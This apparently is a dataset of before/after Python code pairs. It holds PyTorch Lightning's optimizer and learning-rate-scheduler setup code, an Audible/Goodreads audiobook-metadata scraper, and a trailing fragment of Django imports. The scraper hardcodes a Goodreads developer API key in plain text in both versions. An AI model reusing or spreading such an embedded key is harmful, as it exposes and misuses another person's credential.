self._strategy: Optional[pl.strategies.Strategy] = None
self._optimizer_idx = 0
@property
def optimizer(self) -> Optimizer:
return self._optimizer
@classmethod
def _to_lightning_optimizer(
cls, optimizer: Union[Optimizer, "LightningOptimizer"], strategy: "pl.strategies.Strategy", opt_idx: int
) -> "LightningOptimizer":
if isinstance(optimizer, LightningOptimizer):
# the user could return a `LightningOptimizer` from `configure_optimizers`, see test:
# tests/core/test_lightning_optimizer.py::test_lightning_optimizer[False]
lightning_optimizer = optimizer
else:
lightning_optimizer = cls(optimizer)
lightning_optimizer._strategy = proxy(strategy)
lightning_optimizer._optimizer_idx = opt_idx
return lightning_optimizer
@contextmanager
def toggle_model(self, sync_grad: bool = True) -> Generator[None, None, None]:
"""This function is just a helper for advanced users.
Considering the current optimizer as A and all other optimizers as B.
Toggling means all parameters from B exclusive to A will have ``requires_grad`` set to False.
When performing gradient accumulation, there is no need to perform grad synchronization
during the accumulation phase.
Setting `sync_grad` to False will block this synchronization and improve performance.
"""
# local import here to avoid circular import
from pytorch_lightning.loops.utilities import _block_parallel_sync_behavior
assert self._strategy is not None
lightning_module = self._strategy.lightning_module
assert lightning_module is not None
with _block_parallel_sync_behavior(self._strategy, block=(not sync_grad)):
lightning_module.toggle_optimizer(self, self._optimizer_idx)
yield
lightning_module.untoggle_optimizer(self._optimizer_idx)
def step(self, closure: Optional[Callable[[], Any]] = None, **kwargs: Any) -> None:
"""Performs a single optimization step (parameter update).
Args:
closure: An optional optimizer_closure.
kwargs: Any additional arguments to the ``optimizer.step()`` call.
Example::
# Scenario for a GAN using manual optimization
def training_step(...):
opt_gen, opt_dis = self.optimizers()
...
# compute generator loss
loss_gen = self.compute_generator_loss(...)
# zero_grad needs to be called before backward
opt_gen.zero_grad()
self.manual_backward(loss_gen)
opt_gen.step()
# compute discriminator loss
loss_dis = self.compute_discriminator_loss(...)
# zero_grad needs to be called before backward
opt_dis.zero_grad()
self.manual_backward(loss_dis)
opt_dis.step()
# A more advanced example
def training_step(self, batch, batch_idx, ...):
opt_gen, opt_dis = self.optimizers()
...
accumulated_grad_batches = batch_idx % 2 == 0
# compute generator loss
def closure_gen():
loss_gen = self.compute_generator_loss(...)
self.manual_backward(loss_gen)
if accumulated_grad_batches:
opt_gen.zero_grad()
with opt_gen.toggle_model(sync_grad=accumulated_grad_batches):
opt_gen.step(closure=closure_gen)
def closure_dis():
loss_dis = self.compute_discriminator_loss(...)
self.manual_backward(loss_dis)
if accumulated_grad_batches:
opt_dis.zero_grad()
with opt_dis.toggle_model(sync_grad=accumulated_grad_batches):
opt_dis.step(closure=closure_dis)
"""
if closure is None:
closure = do_nothing_closure
profiler_action = "optimizer_step_without_closure"
elif not callable(closure):
raise MisconfigurationException("When `optimizer.step(closure)` is called, the closure should be callable")
else:
profiler_action = "optimizer_step_with_closure"
profiler_action += f"_{self._optimizer_idx}"
assert self._strategy is not None
assert self._strategy.lightning_module is not None
with self._strategy.lightning_module.trainer.profiler.profile(profiler_action):
self._strategy.optimizer_step(self._optimizer, self._optimizer_idx, closure, **kwargs)
def _init_optimizers_and_lr_schedulers(
model: "pl.LightningModule",
) -> Tuple[List[Optimizer], List[LRSchedulerConfig], List[int]]:
"""Calls `LightningModule.configure_optimizers` and parses and validates the output."""
optim_conf = model.trainer._call_lightning_module_hook("configure_optimizers", pl_module=model)
if optim_conf is None:
rank_zero_warn(
"`LightningModule.configure_optimizers` returned `None`, this fit will run with no optimizer",
)
optim_conf = _MockOptimizer()
optimizers, lr_schedulers, optimizer_frequencies, monitor = _configure_optimizers(optim_conf)
lr_scheduler_configs = (
_configure_schedulers_automatic_opt(lr_schedulers, monitor)
if model.automatic_optimization
else _configure_schedulers_manual_opt(lr_schedulers)
)
_set_scheduler_opt_idx(optimizers, lr_scheduler_configs)
_validate_scheduler_api(lr_scheduler_configs, model)
return optimizers, lr_scheduler_configs, optimizer_frequencies
def _configure_optimizers(
optim_conf: Union[Dict[str, Any], List, Optimizer, Tuple]
) -> Tuple[List, List, List, Optional[str]]:
optimizers, lr_schedulers, optimizer_frequencies = [], [], []
monitor = None
# single output, single optimizer
if isinstance(optim_conf, Optimizer):
optimizers = [optim_conf]
# two lists, optimizer + lr schedulers
elif (
isinstance(optim_conf, (list, tuple))
and len(optim_conf) == 2
and isinstance(optim_conf[0], list)
and all(isinstance(opt, Optimizer) for opt in optim_conf[0])
):
opt, sch = optim_conf
optimizers = opt
lr_schedulers = sch if isinstance(sch, list) else [sch]
# single dictionary
elif isinstance(optim_conf, dict):
_validate_optim_conf(optim_conf)
optimizers = [optim_conf["optimizer"]]
monitor = optim_conf.get("monitor", None)
lr_schedulers = [optim_conf["lr_scheduler"]] if "lr_scheduler" in optim_conf else []
# multiple dictionaries
elif isinstance(optim_conf, (list, tuple)) and all(isinstance(d, dict) for d in optim_conf):
for opt_dict in optim_conf:
_validate_optim_conf(opt_dict)
optimizers = [opt_dict["optimizer"] for opt_dict in optim_conf]
scheduler_dict = (
lambda scheduler, opt_idx: dict(scheduler, opt_idx=opt_idx)
if isinstance(scheduler, dict)
else {"scheduler": scheduler, "opt_idx": opt_idx}
)
lr_schedulers = [
scheduler_dict(opt_dict["lr_scheduler"], opt_idx)
for opt_idx, opt_dict in enumerate(optim_conf)
if "lr_scheduler" in opt_dict
]
optimizer_frequencies = [
opt_dict["frequency"] for opt_dict in optim_conf if opt_dict.get("frequency", None) is not None
]
# assert that if frequencies are present, they are given for all optimizers
if optimizer_frequencies and len(optimizer_frequencies) != len(optimizers):
raise ValueError("A frequency must be given to each optimizer.")
# single list or tuple, multiple optimizer
elif isinstance(optim_conf, (list, tuple)) and all(isinstance(opt, Optimizer) for opt in optim_conf):
optimizers = list(optim_conf)
# unknown configuration
else:
raise MisconfigurationException(
"Unknown configuration for model optimizers."
" Output from `model.configure_optimizers()` should be one of:\n"
" * `Optimizer`\n"
" * [`Optimizer`]\n"
" * ([`Optimizer`], [`_LRScheduler`])\n"
' * {"optimizer": `Optimizer`, (optional) "lr_scheduler": `_LRScheduler`}\n'
' * A list of the previously described dict format, with an optional "frequency" key (int)'
)
return optimizers, lr_schedulers, optimizer_frequencies, monitor
def _configure_schedulers_automatic_opt(schedulers: list, monitor: Optional[str]) -> List[LRSchedulerConfig]:
"""Convert each scheduler into `LRSchedulerConfig` with relevant information, when using automatic
optimization."""
lr_scheduler_configs = []
for scheduler in schedulers:
if isinstance(scheduler, dict):
# check provided keys
supported_keys = {field.name for field in fields(LRSchedulerConfig)}
extra_keys = scheduler.keys() - supported_keys
if extra_keys:
rank_zero_warn(
f"Found unsupported keys in the lr scheduler dict: {extra_keys}."
" HINT: remove them from the output of `configure_optimizers`.",
category=RuntimeWarning,
)
scheduler = {k: v for k, v in scheduler.items() if k in supported_keys}
if "scheduler" not in scheduler:
raise MisconfigurationException(
'The lr scheduler dict must have the key "scheduler" with its item being an lr scheduler'
)
if "interval" in scheduler and scheduler["interval"] not in ("step", "epoch"):
raise MisconfigurationException(
'The "interval" key in lr scheduler dict must be "step" or "epoch"'
f' but is "{scheduler['interval']}"'
)
scheduler["reduce_on_plateau"] = isinstance(scheduler["scheduler"], optim.lr_scheduler.ReduceLROnPlateau)
if scheduler["reduce_on_plateau"] and scheduler.get("monitor", None) is None:
raise MisconfigurationException(
"The lr scheduler dict must include a monitor when a `ReduceLROnPlateau` scheduler is used."
' For example: {"optimizer": optimizer, "lr_scheduler":'
' {"scheduler": scheduler, "monitor": "your_loss"}}'
)
is_one_cycle = isinstance(scheduler["scheduler"], optim.lr_scheduler.OneCycleLR)
if is_one_cycle and scheduler.get("interval", "epoch") == "epoch":
rank_zero_warn(
"A `OneCycleLR` scheduler is using 'interval': 'epoch'."
" Are you sure you didn't mean 'interval': 'step'?",
category=RuntimeWarning,
)
config = LRSchedulerConfig(**scheduler)
elif isinstance(scheduler, ReduceLROnPlateau):
if monitor is None:
raise MisconfigurationException(
"`configure_optimizers` must include a monitor when a `ReduceLROnPlateau`"
" scheduler is used. For example:"
' {"optimizer": optimizer, "lr_scheduler": scheduler, "monitor": "metric_to_track"}'
)
config = LRSchedulerConfig(scheduler, reduce_on_plateau=True, monitor=monitor)
else:
config = LRSchedulerConfig(scheduler)
lr_scheduler_configs.append(config)
return lr_scheduler_configs
def _configure_schedulers_manual_opt(schedulers: list) -> List[LRSchedulerConfig]:
"""Convert each scheduler into `LRSchedulerConfig` structure with relevant information, when using manual
optimization."""
lr_scheduler_configs = []
for scheduler in schedulers:
if isinstance(scheduler, dict):
invalid_keys = {"interval", "frequency", "reduce_on_plateau", "monitor", "strict"}
keys_to_warn = [k for k in scheduler.keys() if k in invalid_keys]
if keys_to_warn:
rank_zero_warn(
f"The lr scheduler dict contains the key(s) {keys_to_warn}, but the keys will be ignored."
" You need to call `lr_scheduler.step()` manually in manual optimization.",
category=RuntimeWarning,
)
config = LRSchedulerConfig(**{key: scheduler[key] for key in scheduler if key not in invalid_keys})
else:
config = LRSchedulerConfig(scheduler)
lr_scheduler_configs.append(config)
return lr_scheduler_configs
def _validate_scheduler_api(lr_scheduler_configs: List[LRSchedulerConfig], model: "pl.LightningModule") -> None:
for config in lr_scheduler_configs:
scheduler = config.scheduler
if not isinstance(scheduler, _Stateful):
raise TypeError(
f"The provided lr scheduler `{scheduler.__class__.__name__}` is invalid."
" It should have `state_dict` and `load_state_dict` methods defined."
)
if not isinstance(scheduler, LRSchedulerTypeTuple) and not is_overridden("lr_scheduler_step", model):
raise MisconfigurationException(
f"The provided lr scheduler `{scheduler.__class__.__name__}` doesn't follow PyTorch's LRScheduler"
" API. You should override the `LightningModule.lr_scheduler_step` hook with your own logic if"
" you are using a custom LR scheduler."
)
def _set_scheduler_opt_idx(optimizers: List[Optimizer], lr_scheduler_configs: List[LRSchedulerConfig]) -> None:
for config in lr_scheduler_configs:
for opt_idx, opt in enumerate(optimizers):
if config.scheduler.optimizer is opt:
if config.opt_idx is not None and config.opt_idx != opt_idx:
raise MisconfigurationException(
"`opt_idx` set inside scheduler config does not match with the index"
" of the respective optimizer returned from `configure_optimizers`."
)
config.opt_idx = opt_idx
break
else:
raise MisconfigurationException(
"Some schedulers are attached with an optimizer that wasn't returned from `configure_optimizers`."
)
def _validate_optim_conf(optim_conf: Dict[str, Any]) -> None:
valid_keys = {"optimizer", "lr_scheduler", "frequency", "monitor"}
extra_keys = optim_conf.keys() - valid_keys
if extra_keys:
rank_zero_warn(
f"Found unsupported keys in the optimizer configuration: {set(extra_keys)}", category=RuntimeWarning
)
class _MockOptimizer(Optimizer):
"""The `_MockOptimizer` will be used inplace of an optimizer in the event that `None` is returned from
`configure_optimizers`."""
def __init__(self) -> None:
super().__init__([torch.zeros(1)], {})
def add_param_group(self, param_group: Dict[Any, Any]) -> None:
pass # Do Nothing
def load_state_dict(self, state_dict: Dict[Any, Any]) -> None:
pass # Do Nothing
def state_dict(self) -> Dict[str, Any]:
return {} # Return Empty
def step(self, closure: Callable = None) -> None:
if closure is not None:
closure()
def zero_grad(self, set_to_none: Optional[bool] = False) -> None:
pass # Do Nothing
def __repr__(self) -> str:
return "No Optimizer"
| # Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from contextlib import contextmanager
from dataclasses import fields
from typing import Any, Callable, Dict, Generator, List, Optional, Tuple, Union
from weakref import proxy
import torch
from torch import optim
from torch.optim import Optimizer
import pytorch_lightning as pl
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.model_helpers import is_overridden
from pytorch_lightning.utilities.rank_zero import rank_zero_warn
from pytorch_lightning.utilities.types import _Stateful, LRSchedulerConfig, LRSchedulerTypeTuple, ReduceLROnPlateau
def do_nothing_closure() -> None:
return
class LightningOptimizer:
"""This class is used to wrap the user optimizers and handle properly the backward and optimizer_step logic
across accelerators, AMP, accumulate_grad_batches."""
def __init__(self, optimizer: Optimizer):
# copy most of the `Optimizer` methods into this instance. `__del__` is skipped in case the optimizer has
# implemented custom logic which we would not want to call on destruction of the `LightningOptimizer`
self.__dict__ = {k: v for k, v in optimizer.__dict__.items() if k not in ("step", "__del__")}
# For Horovod
if hasattr(optimizer, "skip_synchronize"):
self.__class__ = type(
"Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__.__bases__[0]), {}
)
self.skip_synchronize = optimizer.skip_synchronize
self.synchronize = optimizer.synchronize
else:
self.__class__ = type("Lightning" + optimizer.__class__.__name__, (self.__class__, optimizer.__class__), {})
self._optimizer = optimizer
self._strategy: Optional[pl.strategies.Strategy] = None
self._optimizer_idx = 0
@property
def optimizer(self) -> Optimizer:
return self._optimizer
@classmethod
def _to_lightning_optimizer(
cls, optimizer: Union[Optimizer, "LightningOptimizer"], strategy: "pl.strategies.Strategy", opt_idx: int
) -> "LightningOptimizer":
if isinstance(optimizer, LightningOptimizer):
# the user could return a `LightningOptimizer` from `configure_optimizers`, see test:
# tests/core/test_lightning_optimizer.py::test_lightning_optimizer[False]
lightning_optimizer = optimizer
else:
lightning_optimizer = cls(optimizer)
lightning_optimizer._strategy = proxy(strategy)
lightning_optimizer._optimizer_idx = opt_idx
return lightning_optimizer
@contextmanager
def toggle_model(self, sync_grad: bool = True) -> Generator[None, None, None]:
"""This function is just a helper for advanced users.
Considering the current optimizer as A and all other optimizers as B.
Toggling means all parameters from B exclusive to A will have ``requires_grad`` set to False.
When performing gradient accumulation, there is no need to perform grad synchronization
during the accumulation phase.
Setting `sync_grad` to False will block this synchronization and improve performance.
"""
# local import here to avoid circular import
from pytorch_lightning.loops.utilities import _block_parallel_sync_behavior
assert self._strategy is not None
lightning_module = self._strategy.lightning_module
assert lightning_module is not None
with _block_parallel_sync_behavior(self._strategy, block=(not sync_grad)):
lightning_module.toggle_optimizer(self, self._optimizer_idx)
yield
lightning_module.untoggle_optimizer(self._optimizer_idx)
def step(self, closure: Optional[Callable[[], Any]] = None, **kwargs: Any) -> None:
"""Performs a single optimization step (parameter update).
Args:
closure: An optional optimizer_closure.
kwargs: Any additional arguments to the ``optimizer.step()`` call.
Example::
# Scenario for a GAN using manual optimization
def training_step(...):
opt_gen, opt_dis = self.optimizers()
...
# compute generator loss
loss_gen = self.compute_generator_loss(...)
# zero_grad needs to be called before backward
opt_gen.zero_grad()
self.manual_backward(loss_gen)
opt_gen.step()
# compute discriminator loss
loss_dis = self.compute_discriminator_loss(...)
# zero_grad needs to be called before backward
opt_dis.zero_grad()
self.manual_backward(loss_dis)
opt_dis.step()
# A more advanced example
def training_step(self, batch, batch_idx, ...):
opt_gen, opt_dis = self.optimizers()
...
accumulated_grad_batches = batch_idx % 2 == 0
# compute generator loss
def closure_gen():
loss_gen = self.compute_generator_loss(...)
self.manual_backward(loss_gen)
if accumulated_grad_batches:
opt_gen.zero_grad()
with opt_gen.toggle_model(sync_grad=accumulated_grad_batches):
opt_gen.step(closure=closure_gen)
def closure_dis():
loss_dis = self.compute_discriminator_loss(...)
self.manual_backward(loss_dis)
if accumulated_grad_batches:
opt_dis.zero_grad()
with opt_dis.toggle_model(sync_grad=accumulated_grad_batches):
opt_dis.step(closure=closure_dis)
"""
if closure is None:
closure = do_nothing_closure
profiler_action = "optimizer_step_without_closure"
elif not callable(closure):
raise MisconfigurationException("When `optimizer.step(closure)` is called, the closure should be callable")
else:
profiler_action = "optimizer_step_with_closure"
profiler_action += f"_{self._optimizer_idx}"
assert self._strategy is not None
assert self._strategy.lightning_module is not None
with self._strategy.lightning_module.trainer.profiler.profile(profiler_action):
self._strategy.optimizer_step(self._optimizer, self._optimizer_idx, closure, **kwargs)
def _init_optimizers_and_lr_schedulers(
model: "pl.LightningModule",
) -> Tuple[List[Optimizer], List[LRSchedulerConfig], List[int]]:
"""Calls `LightningModule.configure_optimizers` and parses and validates the output."""
optim_conf = model.trainer._call_lightning_module_hook("configure_optimizers", pl_module=model)
if optim_conf is None:
rank_zero_warn(
"`LightningModule.configure_optimizers` returned `None`, this fit will run with no optimizer",
)
optim_conf = _MockOptimizer()
optimizers, lr_schedulers, optimizer_frequencies, monitor = _configure_optimizers(optim_conf)
lr_scheduler_configs = (
_configure_schedulers_automatic_opt(lr_schedulers, monitor)
if model.automatic_optimization
else _configure_schedulers_manual_opt(lr_schedulers)
)
_set_scheduler_opt_idx(optimizers, lr_scheduler_configs)
_validate_scheduler_api(lr_scheduler_configs, model)
return optimizers, lr_scheduler_configs, optimizer_frequencies
def _configure_optimizers(
optim_conf: Union[Dict[str, Any], List, Optimizer, Tuple]
) -> Tuple[List, List, List, Optional[str]]:
optimizers, lr_schedulers, optimizer_frequencies = [], [], []
monitor = None
# single output, single optimizer
if isinstance(optim_conf, Optimizer):
optimizers = [optim_conf]
# two lists, optimizer + lr schedulers
elif (
isinstance(optim_conf, (list, tuple))
and len(optim_conf) == 2
and isinstance(optim_conf[0], list)
and all(isinstance(opt, Optimizer) for opt in optim_conf[0])
):
opt, sch = optim_conf
optimizers = opt
lr_schedulers = sch if isinstance(sch, list) else [sch]
# single dictionary
elif isinstance(optim_conf, dict):
_validate_optim_conf(optim_conf)
optimizers = [optim_conf["optimizer"]]
monitor = optim_conf.get("monitor", None)
lr_schedulers = [optim_conf["lr_scheduler"]] if "lr_scheduler" in optim_conf else []
# multiple dictionaries
elif isinstance(optim_conf, (list, tuple)) and all(isinstance(d, dict) for d in optim_conf):
for opt_dict in optim_conf:
_validate_optim_conf(opt_dict)
optimizers = [opt_dict["optimizer"] for opt_dict in optim_conf]
scheduler_dict = (
lambda scheduler, opt_idx: dict(scheduler, opt_idx=opt_idx)
if isinstance(scheduler, dict)
else {"scheduler": scheduler, "opt_idx": opt_idx}
)
lr_schedulers = [
scheduler_dict(opt_dict["lr_scheduler"], opt_idx)
for opt_idx, opt_dict in enumerate(optim_conf)
if "lr_scheduler" in opt_dict
]
optimizer_frequencies = [
opt_dict["frequency"] for opt_dict in optim_conf if opt_dict.get("frequency", None) is not None
]
# assert that if frequencies are present, they are given for all optimizers
if optimizer_frequencies and len(optimizer_frequencies) != len(optimizers):
raise ValueError("A frequency must be given to each optimizer.")
# single list or tuple, multiple optimizer
elif isinstance(optim_conf, (list, tuple)) and all(isinstance(opt, Optimizer) for opt in optim_conf):
optimizers = list(optim_conf)
# unknown configuration
else:
raise MisconfigurationException(
"Unknown configuration for model optimizers."
" Output from `model.configure_optimizers()` should be one of:\n"
" * `Optimizer`\n"
" * [`Optimizer`]\n"
" * ([`Optimizer`], [`_LRScheduler`])\n"
' * {"optimizer": `Optimizer`, (optional) "lr_scheduler": `_LRScheduler`}\n'
' * A list of the previously described dict format, with an optional "frequency" key (int)'
)
return optimizers, lr_schedulers, optimizer_frequencies, monitor
def _configure_schedulers_automatic_opt(schedulers: list, monitor: Optional[str]) -> List[LRSchedulerConfig]:
"""Convert each scheduler into `LRSchedulerConfig` with relevant information, when using automatic
optimization."""
lr_scheduler_configs = []
for scheduler in schedulers:
if isinstance(scheduler, dict):
# check provided keys
supported_keys = {field.name for field in fields(LRSchedulerConfig)}
extra_keys = scheduler.keys() - supported_keys
if extra_keys:
rank_zero_warn(
f"Found unsupported keys in the lr scheduler dict: {extra_keys}."
" HINT: remove them from the output of `configure_optimizers`.",
category=RuntimeWarning,
)
scheduler = {k: v for k, v in scheduler.items() if k in supported_keys}
if "scheduler" not in scheduler:
raise MisconfigurationException(
'The lr scheduler dict must have the key "scheduler" with its item being an lr scheduler'
)
if "interval" in scheduler and scheduler["interval"] not in ("step", "epoch"):
raise MisconfigurationException(
'The "interval" key in lr scheduler dict must be "step" or "epoch"'
f' but is "{scheduler["interval"]}"'
)
scheduler["reduce_on_plateau"] = isinstance(scheduler["scheduler"], optim.lr_scheduler.ReduceLROnPlateau)
if scheduler["reduce_on_plateau"] and scheduler.get("monitor", None) is None:
raise MisconfigurationException(
"The lr scheduler dict must include a monitor when a `ReduceLROnPlateau` scheduler is used."
' For example: {"optimizer": optimizer, "lr_scheduler":'
' {"scheduler": scheduler, "monitor": "your_loss"}}'
)
is_one_cycle = isinstance(scheduler["scheduler"], optim.lr_scheduler.OneCycleLR)
if is_one_cycle and scheduler.get("interval", "epoch") == "epoch":
rank_zero_warn(
"A `OneCycleLR` scheduler is using 'interval': 'epoch'."
" Are you sure you didn't mean 'interval': 'step'?",
category=RuntimeWarning,
)
config = LRSchedulerConfig(**scheduler)
elif isinstance(scheduler, ReduceLROnPlateau):
if monitor is None:
raise MisconfigurationException(
"`configure_optimizers` must include a monitor when a `ReduceLROnPlateau`"
" scheduler is used. For example:"
' {"optimizer": optimizer, "lr_scheduler": scheduler, "monitor": "metric_to_track"}'
)
config = LRSchedulerConfig(scheduler, reduce_on_plateau=True, monitor=monitor)
else:
config = LRSchedulerConfig(scheduler)
lr_scheduler_configs.append(config)
return lr_scheduler_configs
def _configure_schedulers_manual_opt(schedulers: list) -> List[LRSchedulerConfig]:
"""Convert each scheduler into `LRSchedulerConfig` structure with relevant information, when using manual
optimization."""
lr_scheduler_configs = []
for scheduler in schedulers:
if isinstance(scheduler, dict):
invalid_keys = {"interval", "frequency", "reduce_on_plateau", "monitor", "strict"}
keys_to_warn = [k for k in scheduler.keys() if k in invalid_keys]
if keys_to_warn:
rank_zero_warn(
f"The lr scheduler dict contains the key(s) {keys_to_warn}, but the keys will be ignored."
" You need to call `lr_scheduler.step()` manually in manual optimization.",
category=RuntimeWarning,
)
config = LRSchedulerConfig(**{key: scheduler[key] for key in scheduler if key not in invalid_keys})
else:
config = LRSchedulerConfig(scheduler)
lr_scheduler_configs.append(config)
return lr_scheduler_configs
def _validate_scheduler_api(lr_scheduler_configs: List[LRSchedulerConfig], model: "pl.LightningModule") -> None:
for config in lr_scheduler_configs:
scheduler = config.scheduler
if not isinstance(scheduler, _Stateful):
raise TypeError(
f"The provided lr scheduler `{scheduler.__class__.__name__}` is invalid."
" It should have `state_dict` and `load_state_dict` methods defined."
)
if not isinstance(scheduler, LRSchedulerTypeTuple) and not is_overridden("lr_scheduler_step", model):
raise MisconfigurationException(
f"The provided lr scheduler `{scheduler.__class__.__name__}` doesn't follow PyTorch's LRScheduler"
" API. You should override the `LightningModule.lr_scheduler_step` hook with your own logic if"
" you are using a custom LR scheduler."
)
def _set_scheduler_opt_idx(optimizers: List[Optimizer], lr_scheduler_configs: List[LRSchedulerConfig]) -> None:
for config in lr_scheduler_configs:
for opt_idx, opt in enumerate(optimizers):
if config.scheduler.optimizer is opt:
if config.opt_idx is not None and config.opt_idx != opt_idx:
raise MisconfigurationException(
"`opt_idx` set inside scheduler config does not match with the index"
" of the respective optimizer returned from `configure_optimizers`."
)
config.opt_idx = opt_idx
break
else:
raise MisconfigurationException(
"Some schedulers are attached with an optimizer that wasn't returned from `configure_optimizers`."
)
def _validate_optim_conf(optim_conf: Dict[str, Any]) -> None:
valid_keys = {"optimizer", "lr_scheduler", "frequency", "monitor"}
extra_keys = optim_conf.keys() - valid_keys
if extra_keys:
rank_zero_warn(
f"Found unsupported keys in the optimizer configuration: {set(extra_keys)}", category=RuntimeWarning
)
class _MockOptimizer(Optimizer):
"""The `_MockOptimizer` will be used inplace of an optimizer in the event that `None` is returned from
`configure_optimizers`."""
def __init__(self) -> None:
super().__init__([torch.zeros(1)], {})
def add_param_group(self, param_group: Dict[Any, Any]) -> None:
pass # Do Nothing
def load_state_dict(self, state_dict: Dict[Any, Any]) -> None:
pass # Do Nothing
def state_dict(self) -> Dict[str, Any]:
return {} # Return Empty
def step(self, closure: Callable = None) -> None:
if closure is not None:
closure()
def zero_grad(self, set_to_none: Optional[bool] = False) -> None:
pass # Do Nothing
def __repr__(self) -> str:
return "No Optimizer"
|
import re
import goodreads_api_client as gr
import json
import urllib.request
import yaml
from tqdm import tqdm
from bs4 import BeautifulSoup
def audible(url):
"""Add book details from Audible.com webpage.
"""
html = urllib.request.urlopen(url).read()
soup = BeautifulSoup(html, features="html.parser")
jsn = soup.find_all("script", type="application/ld+json")[1]
data = json.loads(jsn.contents[0])[0]
m = data["duration"].lstrip("PT").split("H")[1].split("M")[0]
dic = {
"audible_popularity": int(data["aggregateRating"]["ratingCount"]),
"audible_score": float(data["aggregateRating"]["ratingValue"]),
"year": int(data["datePublished"].split("-")[0]),
"month": int(data["datePublished"].split("-")[1]),
"day": int(data["datePublished"].split("-")[2]),
"hours": int(data["duration"].lstrip("PT").split("H")[0]),
"minutes": int(m) if m else 0,
"image": data["image"],
"title": data["name"].replace("'", "’"),
"authors": [a["name"] for a in data["author"]],
"narrators": [r["name"] for r in data["readBy"]],
"audible": True,
}
return dic
def goodreads(grid):
"""Add book details from Goodreads API.
"""
# print(f"scraping goodreads data from {grid}")
key = "cQudYNjfcBYXcVj9w9zA"
client = gr.Client(developer_key=key)
result = client.Book.show(grid)
dic = {}
if result["series_works"]:
series = result["series_works"]["series_work"]
series = [series] if not isinstance(series, list) else series
dic["series"] = [s["series"]["title"].replace("'", "’") for s in series]
dic["position_in_series"] = [s["user_position"] for s in series]
dic["goodreads_score"] = float(result["average_rating"])
dic["goodreads_popularity"] = int(result["ratings_count"])
# print(f"goodreads data {dic}")
return dic
def updated(book):
"""Returns an audiobook with details from audible and goodreads.
"""
if "title" not in book:
book = {**audible(book["audible_url"]), **book}
if "goodreads_score" not in book:
book = {**goodreads(book["goodreads_id"]), **book}
book["overall_score"] = (book["book"] + book["performance"]) / 2
a = [book["authors"][0].split()[-1]]
if "Jr" in a:
a = [book["authors"][0].split()[-2]]
if "series" in book:
a += book["series"][0].split()
a.append(f"{float(book["position_in_series"][0]):05.2f}")
a += book["title"].split(" ")
a = [b for b in a if b not in ("The", "A")]
book["sorting_key"] = "-".join(re.sub("[^A-Za-z0-9]+", "", b) for b in a)
print(book["sorting_key"])
if "series" in book:
book["series_nested"] = [
{"name": a, "position": b}
for a, b in zip(book["series"], book["position_in_series"])
]
if "tags" not in book:
book["tags"] = []
# book["tags"] = sorted(set(book["tags"] + input("Tags (space delimited):").split()))
return book
def add_tags(books):
"""Adds tags t books.
"""
tags = [
"short-stories",
"novella",
"fixup",
"bildungsroman",
"sci-fi",
"dnf",
"fantasy",
"lgbt-characters",
"feminism",
"mental-illness",
"epistolary",
"racism",
"bechdel-pass",
"bechdel-fail",
"surreal",
]
for tag in tags:
for book in books:
print(tag)
def main():
f = "../../_data/audiobooks.yaml"
books = yaml.load(open(f), Loader=yaml.FullLoader)
books = [updated(book) for book in books]
yaml.dump(books, open(f, "w"))
if __name__ == "__main__":
main()
| import re
import goodreads_api_client as gr
import json
import urllib.request
import yaml
from tqdm import tqdm
from bs4 import BeautifulSoup
def audible(url):
"""Add book details from Audible.com webpage.
"""
html = urllib.request.urlopen(url).read()
soup = BeautifulSoup(html, features="html.parser")
jsn = soup.find_all("script", type="application/ld+json")[1]
data = json.loads(jsn.contents[0])[0]
m = data["duration"].lstrip("PT").split("H")[1].split("M")[0]
dic = {
"audible_popularity": int(data["aggregateRating"]["ratingCount"]),
"audible_score": float(data["aggregateRating"]["ratingValue"]),
"year": int(data["datePublished"].split("-")[0]),
"month": int(data["datePublished"].split("-")[1]),
"day": int(data["datePublished"].split("-")[2]),
"hours": int(data["duration"].lstrip("PT").split("H")[0]),
"minutes": int(m) if m else 0,
"image": data["image"],
"title": data["name"].replace("'", "’"),
"authors": [a["name"] for a in data["author"]],
"narrators": [r["name"] for r in data["readBy"]],
"audible": True,
}
return dic
def goodreads(grid):
"""Add book details from Goodreads API.
"""
# print(f"scraping goodreads data from {grid}")
key = "cQudYNjfcBYXcVj9w9zA"
client = gr.Client(developer_key=key)
result = client.Book.show(grid)
dic = {}
if result["series_works"]:
series = result["series_works"]["series_work"]
series = [series] if not isinstance(series, list) else series
dic["series"] = [s["series"]["title"].replace("'", "’") for s in series]
dic["position_in_series"] = [s["user_position"] for s in series]
dic["goodreads_score"] = float(result["average_rating"])
dic["goodreads_popularity"] = int(result["ratings_count"])
# print(f"goodreads data {dic}")
return dic
def updated(book):
"""Returns an audiobook with details from audible and goodreads.
"""
if "title" not in book:
book = {**audible(book["audible_url"]), **book}
if "goodreads_score" not in book:
book = {**goodreads(book["goodreads_id"]), **book}
book["overall_score"] = (book["book"] + book["performance"]) / 2
a = [book["authors"][0].split()[-1]]
if "Jr" in a:
a = [book["authors"][0].split()[-2]]
if "series" in book:
a += book["series"][0].split()
a.append(f"{float(book['position_in_series'][0]):05.2f}")
a += book["title"].split(" ")
a = [b for b in a if b not in ("The", "A")]
book["sorting_key"] = "-".join(re.sub("[^A-Za-z0-9]+", "", b) for b in a)
print(book["sorting_key"])
if "series" in book:
book["series_nested"] = [
{"name": a, "position": b}
for a, b in zip(book["series"], book["position_in_series"])
]
if "tags" not in book:
book["tags"] = []
# book["tags"] = sorted(set(book["tags"] + input("Tags (space delimited):").split()))
return book
def add_tags(books):
"""Adds tags t books.
"""
tags = [
"short-stories",
"novella",
"fixup",
"bildungsroman",
"sci-fi",
"dnf",
"fantasy",
"lgbt-characters",
"feminism",
"mental-illness",
"epistolary",
"racism",
"bechdel-pass",
"bechdel-fail",
"surreal",
]
for tag in tags:
for book in books:
print(tag)
def main():
f = "../../_data/audiobooks.yaml"
books = yaml.load(open(f), Loader=yaml.FullLoader)
books = [updated(book) for book in books]
yaml.dump(books, open(f, "w"))
if __name__ == "__main__":
main()
|
# Django imports
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.conf import settings # Access to project settings
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
